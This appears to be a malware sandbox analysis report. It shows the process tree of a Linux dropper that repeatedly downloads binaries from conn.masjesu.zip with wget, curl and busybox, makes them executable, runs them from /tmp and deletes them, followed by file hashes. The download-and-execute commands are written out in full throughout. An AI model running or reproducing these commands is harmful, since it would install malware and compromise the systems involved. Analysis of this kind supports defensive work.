/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:933
-
-
/bin/chmodchmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:947
-
-
/bin/chmodchmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:961
-
-
/bin/chmodchmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:996
-
-
/bin/chmodchmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:999
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97